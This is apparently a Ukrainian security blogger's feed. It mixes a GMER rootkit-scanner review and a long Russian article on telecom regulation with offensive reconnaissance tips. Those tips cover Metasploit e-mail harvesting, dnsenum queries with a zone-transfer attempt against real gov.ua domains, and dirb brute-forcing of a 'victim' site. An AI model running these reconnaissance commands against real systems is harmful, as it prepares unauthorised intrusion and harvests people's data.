3. Executing:

> use auxiliary/gather/search_email_collector

3

4. We can see various variables for this exploit:

> show options

4
These variables can be set and/or modified as we need. In my example i'll set a DOMAIN variable to custom domain as shown below:

5

6. We can begin e-mail gathering now by just running command exploit:

6

I hope it would be usefull. Enjoy but remember - google can block U if exploitation will become insane 8]

Review of antirookit tool GMER v 2.1.19357
cert_ua
I'll tell You about some free and usable rootkit tools and their abilities. I try to setup them on some Windows XP SP2 PC and check if some malware is present on it.

1. GMER v 2.1.19357

Can be found here.

Note: some malitious soft won't let gmer.exe launch by detecting and blocking GMER's execution! Developers of GMER recommend to download it like a randomly named EXE-file using button near download link.

It scans for:








  • hidden processes

  • hidden threads

  • hidden modules

  • hidden services

  • hidden files

  • hidden disk sectors (MBR)

  • hidden Alternate Data Streams

  • hidden registry keys

  • drivers hooking SSDT

  • drivers hooking IDT

  • drivers hooking IRP calls

  • inline hooks

  • looks like:
33

as we executed GMER - it already does quick scan (it detected 2 malwares in my PC). After some malwares found we can do some operations with it as shown below:

34

Tab Modules shows information about processes list (like ps command in unix systems), threads and libraries used by any process. Also we can kill or restat any/all working prosesses in system:

35
Tabs Modules and Services are similar and shows us information about working programs and libraries used by them:
36

37

Tab Files can give an ability to surf by filesystem with windows-like interface (far and mc are in panic he he):
38

Tab Registry gives interface that similar to just doing regedit command in windows:
39
We can also check autostarting software by using Autostart tab (click on Scan button and this process takes around 15 seconds):
39
Tab cmd gives command line interface which i've found not very usable (it can't do commands inside of interface of commands. for example it was unable to do hostname resolving inside of nslookup command with this functionality):
39

So...what's wrong with my PC?) what about these rootkits? GMER found and tagged as malware next 2 files:
fltmgr.sys and VMkbd.sys
39
digging in problem gave me an answer. I've checked filesize of fltmgr.sys that lies at C:/Windows/System32/drivers/ - 192k.
I think, GMER marked these file as malware beacuse files sizes where differed from desribed in some databases with filesizes for my Wndows version (it must be another size as says one of specialised web sites):
39
Checking that files with virustotal.com also gave me information about false positives of GMER malware detection:
39


GMER is good tool for simple malware search. It has not bad functionalty and fast.

...подумалось...
cert_ua
СМИ пишут о ком-то или о чём-то в хороших тонах - значит им за это заплатили. Обо всё остальном СМИ пишут чтоб заплатил я.
И ещё вот что, Филипп Пилиппович Преображенский сказал что-то типо "не читайте, милостивый государь, газет перед едой"...нету позитива в информации из СМИ.

О регулировании телекоммуникаций
cert_ua
Цель статьи: разобраься с вопросом регулирования связи на Украине и в мире.

Попытаюсь разъяснить основные принципы и цели регулирования качества услуг в современной системе регулирования сектора телекоммуникаций. Кроме того, обговорю вопросы, которые связаны с качеством услуг, которые предоставляются потребителям. Как вывод, попытаюсь в понятном виде обьяснить перспективы и недостатки системы регулирования рынка телекоммуникаций на Украине. Может, кто-то поймёт причины таких явлений у на на Украине, как непрозрачные условия тарифного пакета мобильной связи, неожиданно плохое качество Интернета, отсутствие должного внимания оператора к проблемам клиентов, непрозрачная госполитика по регулированию рынка телекоммуникаций. Взгрустнёт, конечно, но и узнает о том как и что можно сделать лучше по примеру соседей.

1. Качество услуг


По рекомендациям ITU-T E.800 качество услуг - это совокупная оценка параметров предоставления услуг, которая определяет степень удовлетворения этими услугами пользователя. "Относительно недавно" национальный регулятор рынка телекоммуникаций Украины (НКРЗИ)  своим решением от 15.04.2010 ввёл (для операторов и провайдеров услуг связи, предоставляющих свои услуги на территории Украины/являющихся резидентами Украины) почти такое же определение, которое изложил в виде Положения о качестве предоставляемых услуг.

Важно понимать какие проблемы существовали и требовали урегулирования:
- надо было определить качество услуг (и ввести определение "качество услуги" для в этой сфере).
- надо было избежать негативных проявлений отсутствия понятия "качественная услуга";
- надо было определить параметры для услыг разных видов и цели этих услуг;
- надо было нормативно урегулировать деятельность бизнеса и государства в процессе предоставления телеком-услуг;

2. Зачем регулировать?

Любой продавец стремится к получению максимальной выгоды. Чем больше выгода - тем больше шансов остаться в деле. Далеко не всегда торговцы придерживаются правил и "хорошего тона". это же касается и стремительно развивающегося рынка ІТ, особенно, на Украине. Часто встречающаяся картина, когда покупая услугу "широкополосный" доступ в Интернет или "безлимитный" тариф мобильой связи, замечаешь снижение скорости после какого-то времени пользования этой услугой, отключения и/или удорожание сервисов SMS/MMS и тд. Звонок оператору даёт информацию о том, что "это уже давно устаревший тариф/услуга, оборудование безнадёжно устарело, колличество абонентов настолько велико что они (ТЫ, да ТЫ!) "толкаются" и "мешают" друг-другу и т.д.
На самом деле, из всего выше перечисленного чаще всего вывод один - оператор экономит на клиенте, иными словами
"снижение качества услуг - это скрытое повышение цены". Ведь, то что сэкономит на клиенте оператор, он сможет предоставить другим клиентам. Так же часто встречаются случаи, когда оператор не оглашает всех условий услуги (они где-то мееелким шрифтом сзади договора и в нечитаемых нормальным человеком терминах). Это усложняет понимание потенциальным клиентом отрицательных моментов услуги. Так оператор и "пАрит" клиенту не очень хорошие условия под соусом "новинки", "горячего пакета", "новых выгодных условий" и т.д.

Государства вмешиваются (и наше - не исключение) в этот неравный бой между интересами клиента и продавца услуг телекоммуникаций. Важно понимать, что клиент услуги, перепродавая услугу, может одновременно являться оператором (например, так строится иерархия Интернет-провайдеров - они арендуют серверы, номерной ресурс и другие ресурсы). Процесс регулирования включает в себя описание правил для обеих сторон и решение споров (а они возникают).

Таким образом, ответ на вопрос "зачем регулировать?" состоит из следующих тезисов:
1. надо поддерживать компромисс "цена-качество" на достаточно высоком уровне;

Ведь мы все хотим больше за меньшие деньги, онлайн-видео без тормозов и тд...а сисадмин провайдера - достойную зарплату).
Компромисс "цена-качество" действует в конкуретном и монопольном случаях:

  • это лёгкий способ для компании с регулируемыми ценами выйти на целевой рынок путём уменьшения затрат;

  • если качество не регулировать - оно ухудшается (даже если оно по сути не меняется - появятся услуги которые лучше, время - враг постоянства);

  • уменьшение цен - наиболее популярный инструмент конкуренции, т.к. цену можно понижать быстрее/проще, чем улучшить качество. Так что когда смотрите рекламу, где слышны фразы типа "теперь - дешевле!" - знайте, что это значит ;).


2. надо защитить потребителей от монопольной власти оператора (особенно, у нас и особенно, когда не здоровой/никакой конкуренции).

Примеров ситуации много - например, оператор "Воля-кабель" на заре технологии VoIP на Украине или любая домосетка, когда она одна в многоквартирном жилом доме.
Основные тезисы такие:

  • отсутствие стимулов для повышения предложения или удовлетворения желаний пользователя. Зачем продавцу делать что-то лучше, если и так к нему идёт жирная прибыль? А как же клиент? А что клиент..куда он денется с подводной лодки)))

  • тенденция сохранения маржи путём уменьшения качества мелкооптовых услуг (я уже выше говорил об этом);

  • разница между услугами "высшей категории" и "стандартной категорией" стремится к нулю.

но!

  • на начальном этапе конкуренции установление для всех операторов одинаковых целевых показателей и обязательств по обеспечению качества может стать барьером для вступления на этот рынок новых конкурентов. Ведь не у всех одинаковые финансовые возможности и уравниловка может задушить мелкие компании (для этого и надо регулировать рынок государству в лице НКРЗ).


3. помочь пользователям в осуществлении информированного выбора (особенно, когда рынок насыщен и есть жестокая конкуренция);

- пользователей может больше интересовать цена, чем качество, но согласившись на определённую цену, они хотят получить наилучшее качество за эти деньги;
- корпоративных клиентов часто больше интересует качество, чем цена:

  • в Великобритании 59% молодых семейных пар назвали "наилучшее качество и надёжность" более важным фактором выбора оператора, чем "наинизшую возможную цену";

  • 55% клиентов традиционных операторов по жилищному сектору ("домосеточные порвайдеры") ставят качество выше цены;

  • исследование в Колумбии показало, что покрытие - ключевой фактор для 28% абонентов мобильной связи, качество услуг - для 24%, акции - для 21%.

- публикация информации про результаты измерения качества услуг помогает клиентам делать правильный выбор и проверять заявленные операторами услуги;
но!
- установление одинаковых для всех требований к качеству услуг может ограничить выбор качества и цен.

4. помочь операторам обеспечить добросовестную конккуренцию (оптовое измерение).

- для того чтоб мелкая конкуренция была добросовестной, конкурент, покупающий оптово услуги у доминирующего оператора, должен получать такое же качество, как и ммелкооптовое подразделение доминирующего оператора, который покупает эти же услуги (сложно, но надо понять - "не важно в какой одежде к тебе пришёл покупатель и кто его "крыша", он должн получить свою услугу!"). Не думаю, что это работает везде на 100%, но регуляторы всех стран "стремятся"))
- обеспечивается через установление регуляторных обязанностей на оптовом уровне:

  • недискриминация;

  • прозрачность (публикация SLA (соглашений про уровень услуг) и KPI (ключевых показателей эффективности);

  • функциональное отделение мелких и оптовых подразделений;

  • требования к интероперабельности для обеспечения полной связности (эффективного взаимосвязания).



Когда принимались эти основопологанающие для телекоммуникаций Украины вещи, происходило активное обсуждение, в котором брали участие игроки рынка АйТи, граждане, профильные объединения и отдельные специалисты.

3. Как регулировать?

  1. Поощрительный подход - базируется на силе освещения информации об услугах и на здоровой конкуренции (у нас это не работает, в развитых странах - да):


  • От компаний просто требуется регулярное измерение и публикация конкретных параметров их деятельности (наш вариант):

- можно сравнить всех операторов в стране или на  ммеждународном уровне;
- индивидуальные показатели для разных регионов;
- цели или стандарты для достижения основных показателей.

  • Подход, которому отдаётся приоритет в Европейском Союзе (и он поддерживается системой регулирования ЕС).

2. Принудительный подход - предусматривает установление обязательых целевых показателей и применение санкций в случае их недостижения:

  • стандарты могут устанавливаться на индивидуальном уровне и в случае их недостижния может требоваться наложение клиентам компенсации (или альтернативной услуги);

  • целевые показатели могут устанавливаться на агрегированном уровнес использованием общих санкций в случае недостижения;

  • этот подход характерен для Северной Америки;

  • потенциальные проблемы:

- сложно точно отобразить/понять предпочтения пользователей;
- возможны потенциальные искривления, например, сосредоточение на одних конкретных сферах за счёт других (наше НКРЗИ застекленело на мобильной связи и лицензиях операторам/провайдерам и не толкает IT путём вникания в регулирование новых технологий - например таких как контентная реклама, только недавно зарегулировал худо-бедно услугу "сохранения одного номера при смене мобильного оператора" ...всех наверно это касалось у нас уже).

Мы вот сейчас всё чаще говорим на Украине о движении в ЕС, какие же там полномочия национального регулятора?
Ответ - в параграфе 17 Преамбулы к Директиве про универсальные услуги (2002/22/ЕС):

  • качество и цена - ключевые факторы конкурентного рынка. Национальные регуляторы должны иметь возможность осуществлять мониторинг достигнутого качества услуг субъектов хозяйствования, на которые возложены обязанности по предоставлению универсальных услуг. НР должны иметь возможность измерять качество услуг таких субъектов хозяйствования установленным способом и тогда, когда они сочтут это нужным.

  • НР так же должны иметь возможность осуществлять мониторинг достигнутого качества услуг других субъектов хозяйствования, которые предоставляют телефонные сети и/или телефонные услуги общего пользования пользователям в фиксированных пунктах.

Кроме того, полномочия НР в ЕС таковы (параграф 31 там же):

  • страны-члены должны иметь возможности для мониторинга качества услуг, которые предоставляются;

  • НР должны иметь возможности систематического збора информации про качество услуг, которые предоставляются на их территории, на основе критериев, которые позволяют сравнить провайдеров услуг и между странами-членами ЕС.

  • субъекты хозяйствования, предоставляющие услуги связи в конкурентной среде, более охотно публикуют адекватную и актуальную информацию про свои услуги с целью конкурентных преимуществ.

  • но! НР должны иметь возможность требовать публикации такой информации в случае, если она не эффективно доступна для общества.

Провайдеры универсальных услуг в ЕС (параграф 11 Преамбулы к Директиве про универсальные услуги (2002/22/ЕС)):

  • от НР требуется обеспечивать, чтоб все субъекты хозяйствования, предоставляющие универсальные услуги, публиковали адекватную и актуальную информацию про их деятельность по параметрам, определениям и методам измерения качества услуг, приведённым в Приложении 3 (см ниже).1112 Информация, которая публикуется, так же должна подаваться в НР. Так-то вот...у них описано что, как мерять и кому это надо передавать, чтоб клиенту было понятно.

  • НР могут определить дополнительные стандарты качества услуги, если разработанные параметры, для оценки деятельности субъектов хозяйствования по предоставлению универсальных услуг предоставляются конечным пользователям и потребителям с ограниченным способностями. Тоесть, если многим что-то непончятно - это заставят описать подробнее, а если ты инвалид - тебе помогут не чувствовать это!

  • НР должны иметь возможность установить целевые показатели деятельности для субъектов хозяйствования, которые имеют обязанности по предоставлению универсальных услуг. Страны-члены должны обеспечить, чтоб НР могли осуществлять мониторинг следования этим целевым показателям соответствующими субъектами хозяйствования.

Прозрачность деятельности провайдеров (ст 22 Директивы про универсальные услуги (2002/22/ЕС)):

  • НР должен иметь возможность требовать от субьектов хозяйствования, котрые предоставляют сети и/или услуги электронной связи общего пользования, публикации пригодной для сравнения, адекватной и актуальной информации для конечных пользователей про качество их услуг, а так же мероприятия, которые предприняты для обеспечения эквивалентности доступа для конечных пользователей с ограниченными возможностями

  • эта информация так же должна предоставляться НР по их требованию перед публикацией. 

Измерение качества услуг - все провайдеры:

  • НР могут определять параметры качества услуг, которые должны измеряться, а так же содержание, форму и способ публикацииинформации, в том числе возможные механизмы сертификациикачества, для того, чтобы обеспечить конечным пользователям, в том числе с ограниченными возможностями, доступ к исчерпывающей, пригодной для сравнения, надёжной и лёгкой в пользовании информации.

Целевые показатели качества услуг как минимальные требования - для всех провайдеров:

  • для того, чтобы не допустить ухудшения услуг и уменьшения или замедления трафыка в сетях, страны-члены (прим. ред. "мне нравится этот термин!") должны обеспечить, чтобы НР могли установить минимальные требования к качеству услуг для субьектов хозяйствования, которые предоставляют сети связи общего пользования.

4. Измерение качества услуг

Мониторинг качества услуг предусматривает определение величин (или показателей), которые характеризуют качество разных аспектов услуг, а так же методов их измерения.
Описание показателей качества указывает на то, какой аспект качества они отображают:

  • время, необходимое для исполнения определённых действий: например, "время предоставления услуги" обозначает среднее время, которое необходимо для предоставления услуги;

  • частоту своевременного выпонения определённых действий: например, "своевременность устранения неполадок" обозначает частоту случаев, когда неполадки устраняются своевременно;

  • частоту возникновения событий на одного клиента: например, "частота сообщений про неполадки" означает колличество сообщений про неполадки на одного клиента;

  • частоту возникновения событий, которые имеют определённые свойства: например, "частота сброса звонков" означает часть звонков, которые были сброшены.


Целевые показатели качества услуг - это потенциальная величина (или диапазон) определённого параметра, которая может быть достигнута для того, чтобы качество услуги можно было считать удовлетворительным:

  • "среднее время устранения сообщённых неполадок" как один из параметров, которые публикуются - при этом целевым показателем есть 1,5 дня.

  • "процент звонков, котоые были успешно осуществлены после получения сигнала набора" как один из параметров, которые публикуются - при этом целевым показателем есть 97%.

  • "процент 56-байтных пакетов, утраченных при передаче между репрезентативными источниками и получателями" как один из параметров, которые публикуются - при этом целевым показателем есть 1,0%.

Справедливости ради надо отметить, что есть страны, в которых методики мониторина отличаются от выше перечисленных. Например, в Великобритании, Латвии и Индии НР мониторит качество услуг путём "тестирования лету". В Индии и Германии так же применяется опрос пользователей.


Кстати, Роскомнадзор наконец определил, что такое "плохая сотовая связь" (гуглить надо "Концепция по созданию системы контроля качества предоставления услуг связи в Российской Федерации"). Там 25 параметров. Среди них следующее:

  • Если в месяц больше 5% разговров прервано из-за сбоев в сети.

  • Если 5% SMS и MMS не дошли до адрессата.

  • Если 5% бесед было не разобрать (сигнал был, но помех было больше).

  • Если оператор за 8 секунд не соединяет с номером другого абонента (не мобильный) и 2,5 секунды - мобильный-мобильный.


5. Что регулируется

Услуги, которые подлежат регулированию в ЕС:

  • универсальная услуга;

  • фиксированная телефония;

  • мобильная телефония;

  • Интернет-услуги.

По результату анализа некоторых стран приведу табличку по практике регулирования:

1113

6. Определение и методы измерени я качества услуг

ETSI стандартизировала измерения, которые требуются Еврокомиссией (статтьи 11 и 22 Директивы про универсальную услугу), получилось примерно следующее:

1114

7. Практика регулирования других стран

Финляндия

  • FICORA на своём веб-сайте имела свою сертифицированную услугу Nettimitari (что-то типо speedtest.net), но приостановила 23.04.2010 её  предоставление, т.к. технология устарела ибо не позволяла мерять скорость мобильного широкополосного доступа на скоростях > 70 Мбит/с.

  • в положениях и условиях контракта должно быть определено как конечный пользователь и оператор могут проверить скорость.

  • FICORA 58/2012 M - все требования НР.

Жаль что я не понимаю финский))...красота же!

Швеция

  • Бюро защиты прав телеком-услуг, телевидения и Интернета (The Swedish Consumer Bureau for Telecom, TV & Internet) в 2007-2008 году получило много жалоб пользователей на разницу между рекламной и реальной скоростями. Жалоба была передана Национальному совета по рассмотрению жалоб пользователей (ARN), которая приняла решение - разница эта может быть приемлема (6-8 Мбит/с) и неприемлема (10-15Мбит/с до 24 Мбит/с) в других случаях.

  • Провайдеры фиксированного Интернета c 01.08.2008 приняли (добровольно!) Кодекс поведения (при поддержке PTS и Konsumentverket (это видимо что-то типа нашего Бюро защиты прав потребителей). Сейчас все правила ведения бизнеса и отношений в Швеции изложены в нижеследующих документах:

  • глобально - Swedish Code of Statutes (от 05.06.2008);

  • по телекоммуникациям - Act on Electronic Commerce and other Information Society Services (2002:562).

  • в рекламе доступа в Интернет оператор должен обозначать скорость в виде диапазонов, а не в формате "до..." (тоесть от 8-24 Мбит/с). При этом оператор должен гарантировать нижнюю границу скорости диапазона.

  • всем операторы тесно работают с сайтом http://www.bredbandskollen.se/. Функционал зацените сами, нашим регуляторам и не снилось)

  • вот как выглядит интерактивная карта покрытия одного из провайдеров телеком услуг Швеции - фирмы Telia:

1116
это ж бубль гум!!

8. Выводы

  • сильное давление с целью снижения цен или повышения качества услыг может вызывать негативные последствия на качество услуг если не забоититься чтоб этого не случилось (т.е. регулироваь НАДО).

  • измерение качества услуг может быть полезным, особенно если публикуются результаты измерений для всех опраторов, но установление целевых показателей для всех, а не для доминирующих операторов може иметь негативные последствия.

  • обеспечению эффективности мониторинга качества услуг помогает использование умений операторов и замечаний клиентов (консультации, рабочие группы, отрытые встречи и тд..)

  • результаты измерений должны быть важными для клиентов, практическими для операторов и пригодными для сравнения операторов. Измерения надо делать только для нескольких аспектов услуг.



В заключении хотелось бы пожелать нашему регулятору рынка телекоммуникаций не зарегулировать до смерти наших налогоплательщиков и дать им возможность (желание-то у них есть!) дать народу угля Интернетов!!)

Всем удачи.

Разведка сетевой инфраструктуры с помощью DNS
cert_ua
В состав пакета BackTrack Linux 5 входит набор утилит для работы с протоколом DNS. О них и расскажу.

1. dnsenum [имя DNS-сервера] <домен> - даёт информацию о домене. Есть поддержка GOOGLE-scraping, брутфорса по словарю,  проверки сети класса С, проверки обратной зоны (reverse lookup), таймаутов при проверке, вывода результатов в файл.
Боевые комбинации:
dnsenum.pl --dnsserver 193.109.8.115 dsszzi.gov.ua - узнать у конкретного сервера имён, что он знает о домене

dnsenum.pl -p 10 gov.ua - узнать ответственные за домен серверы DNS, версии их ПО, попытаться получить AXFR zone query

Полезности утилиты dirb в BackTrack Linux 5.3
cert_ua
1. Взможности

Мне очень понравился инструментарий:

1 - dirb

2. Пробую:

2.1 Нахождение папок веб-сайта по словарю:

#/pentest/enumeration/web/dirb# ./dirb http://жертва.ua wordlists/common.txt -X .php,.html

Команда перебирает по словарю common.txt , лежащему в подпапке wordlists все файлы с расширениями .php и .html (флаг -Х - это поиск по расширениям). Результат примерно такой:

2 - dirb


Возможен также вариант поиска по SSL для чего надо просто указать https:// вместо http:// перед доменным именем.

Ещё можно искать кукиз, по юзер-агенту, через проксю, с хттп-авторизацией, с отпадом по таймауту, рекурсивно и не очень и тд. Короче, мощная вещь, советую. Тулза поможет найти свет даже в очень афроамерикански чёрных туннелях ;)

You are viewing cert_ua